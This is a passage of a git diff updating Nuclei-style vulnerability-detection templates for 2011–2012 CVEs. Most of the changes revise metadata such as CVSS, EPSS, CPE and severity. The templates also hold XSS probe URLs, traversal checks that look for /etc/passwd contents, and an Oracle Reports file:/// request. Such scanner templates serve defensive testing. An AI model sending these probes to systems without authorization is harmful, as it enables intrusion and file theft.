http://wordpress.org/extend/plugins/clickdesk-live-support-chat-plugin/changelog/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/71469 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2011-5181 cwe-id: CWE-79 + epss-score: 0.00326 + cpe: cpe:2.3:a:clickdesk:clickdesk_live_support-live_chat_plugin:2.0:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/clickdesk-live-support-chat/" + vendor: clickdesk + product: clickdesk_live_support-live_chat_plugin tags: cve,cve2011,wordpress,xss,wp-plugin http: @@ -27,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2011/CVE-2011-5252.yaml b/http/cves/2011/CVE-2011-5252.yaml index e6242ec0da..52d3dd4fa4 100644 --- a/http/cves/2011/CVE-2011-5252.yaml +++ b/http/cves/2011/CVE-2011-5252.yaml @@ -11,14 +11,18 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2011-5252 - https://www.invicti.com/web-applications-advisories/open-redirection-vulnerability-in-orchard/ - https://exchange.xforce.ibmcloud.com/vulnerabilities/72110 + - http://orchard.codeplex.com/discussions/283667 classification: - cvss-metrics: AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N cvss-score: 5.8 cve-id: CVE-2011-5252 cwe-id: CWE-20 + epss-score: 0.0304 cpe: cpe:2.3:a:orchardproject:orchard:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: orchardproject + product: orchard tags: cve,cve2011,redirect,orchard http: diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index f7d234f7bf..1d9c89e55e 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -7,16 +7,19 @@ info: description: A cross-site scripting vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-5265 - - http://web.archive.org/web/20210123103000/https://www.securityfocus.com/bid/50779/ - https://exchange.xforce.ibmcloud.com/vulnerabilities/71468 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2011-5265 cwe-id: CWE-79 - cvss-score: 4.3 + epss-score: 0.00432 + cpe: cpe:2.3:a:featurific_for_wordpress_project:featurific-for-wordpress:1.6.2:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/featurific-for-wordpress" + vendor: featurific_for_wordpress_project + product: featurific-for-wordpress tags: cve,cve2011,wordpress,xss,wp-plugin http: @@ -27,9 +30,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml index afb5f2abae..65aade183b 100644 --- a/http/cves/2012/CVE-2012-0392.yaml +++ b/http/cves/2012/CVE-2012-0392.yaml @@ -3,22 +3,27 @@ id: CVE-2012-0392 info: name: Apache Struts2 S2-008 RCE author: pikpikcu - severity: critical + severity: medium description: The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method. reference: - https://cwiki.apache.org/confluence/display/WW/S2-008 https://blog.csdn.net/weixin_43416469/article/details/113850545 - http://www.exploit-db.com/exploits/18329 - https://lists.immunityinc.com/pipermail/dailydave/2012-January/000011.html - http://web.archive.org/web/20150110183326/http://secunia.com:80/advisories/47393 + - http://struts.apache.org/2.x/docs/s2-008.html remediation: Developers should immediately upgrade to at least Struts 2.3.18. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2012-0392 cwe-id: NVD-CWE-noinfo - tags: cve2012,apache,rce,struts,java,edb,cve + epss-score: 0.97059 + cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: struts + tags: cve2012,apache,rce,struts,java,edb,cve http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml index 28f3404635..a6f87cd4be 100644 --- a/http/cves/2012/CVE-2012-0394.yaml +++ b/http/cves/2012/CVE-2012-0394.yaml @@ -3,7 +3,7 @@ id: CVE-2012-0394 info: name: Apache Struts <2.3.1.1 - Remote Code Execution author: tess - severity: critical + severity: medium description: | Apache Struts before 2.3.1.1 is susceptible to remote code execution. When developer mode is used in the DebuggingInterceptor component, a remote attacker can execute arbitrary OGNL commands via unspecified vectors, which can allow for execution of malware, obtaining sensitive information, modifying data, and/or gaining full control over a compromised system without entering necessary credentials.. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself." reference: @@ -13,16 +13,19 @@ info: - http://www.exploit-db.com/exploits/18329 - https://nvd.nist.gov/vuln/detail/CVE-2012-0394 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P + cvss-score: 6.8 cve-id: CVE-2012-0394 - cwe-id: CWE-77 + cwe-id: CWE-94 + epss-score: 0.953 + cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: html:"Struts Problem Report" verified: true + vendor: apache + product: struts tags: ognl,injection,edb,cve,cve2012,apache,struts - variables: first: "{{rand_int(1000, 9999)}}" second: "{{rand_int(1000, 9999)}}" diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml index 44e466cf92..74aeddee10 100644 --- a/http/cves/2012/CVE-2012-0896.yaml +++ b/http/cves/2012/CVE-2012-0896.yaml @@ -3,21 +3,26 @@ id: CVE-2012-0896 info: name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access author: daffainfo - severity: high + severity: medium description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter. reference: - https://packetstormsecurity.com/files/108631/ - - http://web.archive.org/web/20140804110141/http://secunia.com/advisories/47529/ - http://plugins.trac.wordpress.org/changeset/488883/count-per-day - https://https://nvd.nist.gov/vuln/detail/CVE-2012-0896 + - http://wordpress.org/extend/plugins/count-per-day/changelog/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/72385 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2012-0896 cwe-id: CWE-22 + epss-score: 0.02262 + cpe: cpe:2.3:a:count_per_day_project:count_per_day:2.2:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/count-per-day" + vendor: count_per_day_project + product: count_per_day tags: packetstorm,cve,cve2012,lfi,wordpress,wp-plugin,traversal http: @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index cd65bdcf20..9747022681 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -11,12 +11,16 @@ info: - https://exchange.xforce.ibmcloud.com/vulnerabilities/72271 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2012-0901 cwe-id: CWE-79 - cvss-score: 4.3 + epss-score: 0.00216 + cpe: cpe:2.3:a:attenzione:yousaytoo:1.0:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/yousaytoo-auto-publishing-plugin" + vendor: attenzione + product: yousaytoo tags: wp-plugin,packetstorm,cve,cve2012,wordpress,xss http: @@ -27,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml index a5333c715d..0402f52eb2 100644 --- a/http/cves/2012/CVE-2012-0981.yaml +++ b/http/cves/2012/CVE-2012-0981.yaml @@ -3,21 +3,25 @@ id: CVE-2012-0981 info: name: phpShowtime 2.0 - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php. reference: - https://www.exploit-db.com/exploits/18435 - https://nvd.nist.gov/vuln/detail/CVE-2012-0981 - - http://web.archive.org/web/20151016200610/http://secunia.com/advisories/47802/ - http://www.exploit-db.com/exploits/18435 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/72824 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2012-0981 cwe-id: CWE-22 - tags: phpshowtime,edb,cve,cve2012,lfi + epss-score: 0.05654 + cpe: cpe:2.3:a:kybernetika:phpshowtime:2.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: kybernetika + product: phpshowtime + tags: phpshowtime,edb,cve,cve2012,lfi http: - method: GET @@ -26,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml index d1dc8781fa..62c4c0e92d 100644 --- a/http/cves/2012/CVE-2012-0991.yaml +++ b/http/cves/2012/CVE-2012-0991.yaml @@ -3,21 +3,25 @@ id: CVE-2012-0991 info: name: OpenEMR 4.1 - Local File Inclusion author: daffainfo - severity: high + severity: low description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter. reference: - https://www.exploit-db.com/exploits/36650 - https://nvd.nist.gov/vuln/detail/CVE-2012-0991 - - http://web.archive.org/web/20210121221715/https://www.securityfocus.com/bid/51788/ - http://www.open-emr.org/wiki/index.php/OpenEMR_Patches + - https://exchange.xforce.ibmcloud.com/vulnerabilities/72914 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:S/C:P/I:N/A:N + cvss-score: 3.5 cve-id: CVE-2012-0991 - tags: lfi,openemr,traversal,edb,cve,cve2012 + cwe-id: CWE-22 + epss-score: 0.89208 + cpe: cpe:2.3:a:openemr:openemr:4.1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: openemr + product: openemr + tags: lfi,openemr,traversal,edb,cve,cve2012 http: - method: GET @@ -26,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml index 28c249b600..9a6a2f5af4 100644 --- a/http/cves/2012/CVE-2012-0996.yaml +++ b/http/cves/2012/CVE-2012-0996.yaml @@ -3,7 +3,7 @@ id: CVE-2012-0996 info: name: 11in1 CMS 1.2.1 - Local File Inclusion (LFI) author: daffainfo - severity: high + severity: medium description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php. reference: - https://www.exploit-db.com/exploits/36784 @@ -12,12 +12,16 @@ info: remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2012-0996 cwe-id: CWE-22 - cvss-score: 5.0 - tags: cve,cve2012,lfi,edb + epss-score: 0.01398 + cpe: cpe:2.3:a:11in1:11in1:1.2.1:stable_12-31-2011:*:*:*:*:*:* metadata: max-request: 1 + vendor: 11in1 + product: 11in1 + tags: cve,cve2012,lfi,edb http: - method: GET @@ -26,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml index 62aab8bb73..34f2e69e0d 100644 --- a/http/cves/2012/CVE-2012-1226.yaml +++ b/http/cves/2012/CVE-2012-1226.yaml @@ -8,17 +8,22 @@ info: reference: - https://www.exploit-db.com/exploits/36873 - https://nvd.nist.gov/vuln/detail/CVE-2012-1226 - - http://web.archive.org/web/20210508221434/https://www.securityfocus.com/archive/1/521583 - http://www.vulnerability-lab.com/get_content.php?id=428 + - http://www.exploit-db.com/exploits/18480 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/73136 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2012-1226 cwe-id: CWE-22 - tags: cve,cve2012,lfi,dolibarr,traversal,edb + epss-score: 0.10469 + cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:3.2.0:alpha:*:*:*:*:*:* metadata: max-request: 1 + vendor: dolibarr + product: dolibarr_erp\/crm + tags: cve,cve2012,lfi,dolibarr,traversal,edb http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml index ae15fd0446..2ca989ea68 100644 --- a/http/cves/2012/CVE-2012-1823.yaml +++ b/http/cves/2012/CVE-2012-1823.yaml @@ -3,7 +3,7 @@ id: CVE-2012-1823 info: name: PHP CGI v5.3.12/5.4.2 Remote Code Execution author: pikpikcu - severity: critical + severity: high description: | sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case. reference: @@ -11,14 +11,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2012-1823 - https://bugs.php.net/bug.php?id=61910 - http://www.php.net/ChangeLog-5.php#5.4.2 + - http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03360041 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2012-1823 - tags: cve2012,kev,vulhub,rce,php,cve + cwe-id: CWE-20 + epss-score: 0.97494 + cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: php + product: php + tags: cve2012,kev,vulhub,rce,php,cve http: - raw: diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index 363202f83d..c1e5c44ee1 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -12,29 +12,33 @@ info: - https://www.htbridge.com/advisory/HTB23082 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2012-1835 cwe-id: CWE-79 - cvss-score: 4.3 + epss-score: 0.00229 + cpe: cpe:2.3:a:timely:all-in-one_event_calendar:1.4:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/all-in-one-event-calendar" + vendor: timely + product: all-in-one_event_calendar tags: cve,cve2012,wordpress,xss,wp-plugin http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' - # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' - # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' - # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index 1e684d4be4..1d00465bd2 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -7,17 +7,22 @@ info: description: A cross-site scripting vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-2371 - - http://web.archive.org/web/20140805090129/http://secunia.com/advisories/49143/ - http://www.openwall.com/lists/oss-security/2012/05/15/12 - http://packetstormsecurity.org/files/112658/WordPress-WP-FaceThumb-Gallery-0.1-Cross-Site-Scripting.html + - http://wordpress.org/support/topic/plugin-wp-facethumb-reflected-xss-vulnerability-cwe-79 + - http://www.openwall.com/lists/oss-security/2012/05/16/1 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-2371 cwe-id: CWE-79 - tags: packetstorm,cve,cve2012,wordpress,xss,wp-plugin + epss-score: 0.00857 + cpe: cpe:2.3:a:mnt-tech:wp-facethumb:0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: mnt-tech + product: wp-facethumb + tags: packetstorm,cve,cve2012,wordpress,xss,wp-plugin http: - method: GET @@ -27,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml index b34d2bd37d..83f8ba0f8b 100644 --- a/http/cves/2012/CVE-2012-3153.yaml +++ b/http/cves/2012/CVE-2012-3153.yaml @@ -3,7 +3,7 @@ id: CVE-2012-3153 info: name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153) author: Sid Ahmed MALAOUI @ Realistic Security - severity: critical + severity: medium description: | An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown @@ -13,14 +13,19 @@ info: - https://www.exploit-db.com/exploits/31737 - https://www.oracle.com/security-alerts/cpuoct2012.html - http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html + - http://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N cvss-score: 6.4 cve-id: CVE-2012-3153 cwe-id: NVD-CWE-noinfo - tags: cve,cve2012,oracle,rce,edb + epss-score: 0.97048 + cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: oracle + product: fusion_middleware + tags: cve,cve2012,oracle,rce,edb http: - method: GET @@ -29,27 +34,29 @@ http: - "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///" req-condition: true + matchers-condition: and matchers: - type: dsl dsl: - 'contains(body_1, "Reports Servlet")' - - type: status - status: - - 200 - - type: dsl dsl: - '!contains(body_2, "" - part: body - type: word part: header diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index b0d038c2a2..008e4303f8 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -3,21 +3,26 @@ id: CVE-2012-4253 info: name: MySQLDumper 1.24.4 - Directory Traversal author: daffainfo - severity: high + severity: medium description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php. reference: - https://www.exploit-db.com/exploits/37129 - https://nvd.nist.gov/vuln/detail/CVE-2012-4253 - http://packetstormsecurity.org/files/112304/MySQLDumper-1.24.4-LFI-XSS-CSRF-Code-Execution-Traversal.html - https://exchange.xforce.ibmcloud.com/vulnerabilities/75286 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/75283 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N cvss-score: 4.3 cve-id: CVE-2012-4253 cwe-id: CWE-22 - tags: packetstorm,cve,cve2012,lfi,edb + epss-score: 0.03411 + cpe: cpe:2.3:a:mysqldumper:mysqldumper:1.24.4:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: mysqldumper + product: mysqldumper + tags: packetstorm,cve,cve2012,lfi,edb http: - method: GET @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index 267808f18e..a8d9e9377e 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -10,14 +10,19 @@ info: - http://plugins.trac.wordpress.org/changeset?old_path=%2F2-click-socialmedia-buttons&old=532798&new_path=%2F2-click-socialmedia-buttons&new=532798 - http://wordpress.org/extend/plugins/2-click-socialmedia-buttons/changelog/ - http://packetstormsecurity.org/files/112615/WordPress-2-Click-Socialmedia-Buttons-Cross-Site-Scripting.html + - https://exchange.xforce.ibmcloud.com/vulnerabilities/75518 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-4273 cwe-id: CWE-79 + epss-score: 0.00252 + cpe: cpe:2.3:a:ppfeufer:2-click-social-media-buttons:*:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/2-click-socialmedia-buttons" + vendor: ppfeufer + product: 2-click-social-media-buttons tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm http: @@ -28,9 +33,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml index 1f99310ae9..2fcc5dfd37 100644 --- a/http/cves/2012/CVE-2012-4547.yaml +++ b/http/cves/2012/CVE-2012-4547.yaml @@ -10,14 +10,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2012-4547 - http://awstats.sourceforge.net/docs/awstats_changelog.txt - http://openwall.com/lists/oss-security/2012/10/29/7 + - http://openwall.com/lists/oss-security/2012/10/26/1 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-4547 cwe-id: CWE-79 - tags: cve,cve2012,xss,awstats,edb + epss-score: 0.0023 + cpe: cpe:2.3:a:laurent_destailleur:awstats:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: laurent_destailleur + product: awstats + tags: cve,cve2012,xss,awstats,edb http: - method: GET @@ -26,6 +31,7 @@ http: - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index 2c855ad445..b42ca9feec 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -9,14 +9,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2012-4768 - http://packetstormsecurity.org/files/116408/wpdownloadmonitor3357-xss.txt - http://www.reactionpenetrationtesting.co.uk/wordpress-download-monitor-xss.html + - https://exchange.xforce.ibmcloud.com/vulnerabilities/78422 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-4768 cwe-id: CWE-79 - tags: xss,wp-plugin,packetstorm,cve,cve2012,wordpress + epss-score: 0.00922 + cpe: cpe:2.3:a:mikejolley:download_monitor:3.3.5.7:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: mikejolley + product: download_monitor + tags: xss,wp-plugin,packetstorm,cve,cve2012,wordpress http: - method: GET @@ -26,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml index bfb9f16f6e..792e7901f4 100644 --- a/http/cves/2012/CVE-2012-4878.yaml +++ b/http/cves/2012/CVE-2012-4878.yaml @@ -3,21 +3,26 @@ id: CVE-2012-4878 info: name: FlatnuX CMS - Directory Traversal author: daffainfo - severity: high + severity: medium description: A path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action. reference: - https://www.exploit-db.com/exploits/37034 - https://nvd.nist.gov/vuln/detail/CVE-2012-4878 - http://www.vulnerability-lab.com/get_content.php?id=487 - http://packetstormsecurity.org/files/111473/Flatnux-CMS-2011-08.09.2-CSRF-XSS-Directory-Traversal.html + - https://exchange.xforce.ibmcloud.com/vulnerabilities/74568 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2012-4878 cwe-id: CWE-22 - tags: cve2012,lfi,traversal,edb,packetstorm,cve + epss-score: 0.01193 + cpe: cpe:2.3:a:flatnux:flatnux:2011-08-09-2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: flatnux + product: flatnux + tags: cve2012,lfi,traversal,edb,packetstorm,cve http: - method: GET @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml index 48f4378b05..90f92a0122 100644 --- a/http/cves/2012/CVE-2012-4889.yaml +++ b/http/cves/2012/CVE-2012-4889.yaml @@ -6,18 +6,22 @@ info: severity: medium description: Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do. reference: - - http://web.archive.org/web/20210121082432/https://www.securityfocus.com/bid/52841/info - https://nvd.nist.gov/vuln/detail/CVE-2012-4889 - http://packetstormsecurity.org/files/111474/VL-437.txt - http://www.vulnerability-lab.com/get_content.php?id=437 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/74538 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-4889 cwe-id: CWE-79 - tags: cve,cve2012,xss,manageengine,packetstorm + epss-score: 0.02518 + cpe: cpe:2.3:a:manageengine:firewall_analyzer:7.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: manageengine + product: firewall_analyzer + tags: cve,cve2012,xss,manageengine,packetstorm http: - method: GET @@ -27,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word part: header diff --git a/http/cves/2012/CVE-2012-4940.yaml b/http/cves/2012/CVE-2012-4940.yaml index 4f32e1b451..10c26ba029 100644 --- a/http/cves/2012/CVE-2012-4940.yaml +++ b/http/cves/2012/CVE-2012-4940.yaml @@ -3,21 +3,24 @@ id: CVE-2012-4940 info: name: Axigen Mail Server Filename Directory Traversal author: dhiyaneshDk - severity: high + severity: medium description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI. reference: - https://www.exploit-db.com/exploits/37996 - https://nvd.nist.gov/vuln/detail/CVE-2012-4940 - http://www.kb.cert.org/vuls/id/586556 - - 